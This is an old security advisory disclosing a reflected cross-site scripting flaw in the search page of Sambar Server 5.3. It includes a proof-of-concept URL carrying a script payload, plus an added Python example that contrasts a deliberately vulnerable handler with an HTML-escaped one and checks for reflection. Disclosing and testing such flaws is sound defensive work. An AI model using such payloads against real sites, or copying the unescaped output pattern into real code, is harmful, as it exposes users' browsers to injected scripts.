Message-ID: <00ce01c2bffd$61ec6a70$0300a8c0@galiarept>
From: galiarept at security-corp.org (galiarept [security-corp])
Subject: .: Sambar Server Cross-Site Scripting vulnerability :.
.: Sambar Server Cross-Site Scripting vulnerability :.
________________________________________________________________________
Security Corporation Security Advisory [SCSA-001]
________________________________________________________________________
PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior
________________________________________________________________________
DESCRIPTION
________________________________________________________________________
"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000,
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net)
DETAILS
________________________________________________________________________
A reflected cross-site scripting bug was found in Sambar Server: the search
term submitted to the search section of the web site is written back into the
results page without being encoded, so a crafted URL causes attacker-supplied
JavaScript to execute in the browser of anyone who follows it. Anyone who can
get a user to open such a link can inject specially crafted markup and/or
other malicious scripts into the page.
EXPLOITS
________________________________________________________________________
http://localhost/search/results.stm?query=<script>alert('Test%20of%20vulnerability');</script>
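The following is an added example, not code from the advisory or from Sambar. It models the reflected search parameter described above with two hypothetical handler functions (a verbatim copy of the search term, and the same page with the term HTML-encoded), builds the probe URL from the advisory's payload, and runs the check a tester would apply to a captured response: does the raw payload come back intact? The response bodies are constructed here, not captured from a real server.

```python
"""Reflected XSS probe and check, modelled on the search/results.stm issue.

Added example: the two handlers are hypothetical stand-ins for the server's
results template, and every response body is constructed locally.
"""
import html
from urllib.parse import quote

# Payload from the advisory (decoded form); the browser URL-encodes it.
PAYLOAD = "<script>alert('Test of vulnerability');</script>"


def build_probe_url(base="http://localhost/search/results.stm", query=PAYLOAD):
    """Build the crafted URL a tester would hand to a victim or a browser.
    safe="" percent-encodes everything outside the unreserved set, so the
    payload arrives exactly as sent and is decoded once by the server."""
    return f"{base}?query={quote(query, safe='')}"


def vulnerable_results(query):
    """Hypothetical stand-in for the unpatched results page: the search term
    is copied into the HTML verbatim, so markup inside it becomes part of
    the page and any <script> element runs in the victim's browser."""
    return f"<html><body><h1>Results for: {query}</h1></body></html>"


def hardened_results(query):
    """Same page with the term HTML-encoded before it is written out.
    quote=True also encodes ' and " so the value is safe inside attributes."""
    return (
        "<html><body><h1>Results for: "
        f"{html.escape(query, quote=True)}</h1></body></html>"
    )


def reflects_unescaped(body, payload):
    """True when the raw payload appears in the response. A match means the
    markup survived the round trip and the browser will execute it."""
    return payload in body


def xss_check(handler, payload=PAYLOAD):
    """Run the probe against a handler and report what came back."""
    body = handler(payload)
    return {
        "vulnerable": reflects_unescaped(body, payload),
        "escaped_present": html.escape(payload, quote=True) in body,
    }


if __name__ == "__main__":
    print(build_probe_url())
    print("vulnerable handler:", xss_check(vulnerable_results))
    print("hardened handler:  ", xss_check(hardened_results))
```

Against a live target the same check is applied to the body returned for the probe URL: if the unencoded payload is present in the HTML, the parameter is reflected without encoding and the page is exploitable; if only the entity-encoded form appears, the term is being rendered as text.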
SOLUTIONS
________________________________________________________________________
No fix is available at the time of writing. The general remedy is to
HTML-encode the search term before writing it into the results page, so the
browser renders it as text rather than as markup.
VENDOR STATUS
________________________________________________________________________
Sambar has been contacted.
------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------------